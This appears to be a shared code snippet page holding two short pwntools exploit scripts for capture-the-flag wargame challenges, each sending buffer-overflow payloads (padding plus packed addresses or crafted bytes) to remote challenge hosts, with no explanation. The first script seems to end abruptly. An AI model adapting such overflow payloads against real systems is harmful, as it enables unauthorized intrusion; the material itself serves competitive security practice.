Skip to content

Instantly share code, notes, and snippets.

from pwn import *
puts = 0x0804A018
leak = 0x0804865F
rand = 0x0804A028
r = remote('chall05-pwn02.wargame.whitehat.vn', 28104)
# r = process('./pwnd')
# gdb.attach(r, )
r.recvuntil("name: ")
r.sendline('a'*96+p32(rand))
from pwn import *
r = remote('chall05-pwn01.wargame.whitehat.vn', 28103)
# r = process('./catflag')
# gdb.attach(r, )
r.sendline('\x00'*100+'\x46'*5+'\x47')
r.interactive()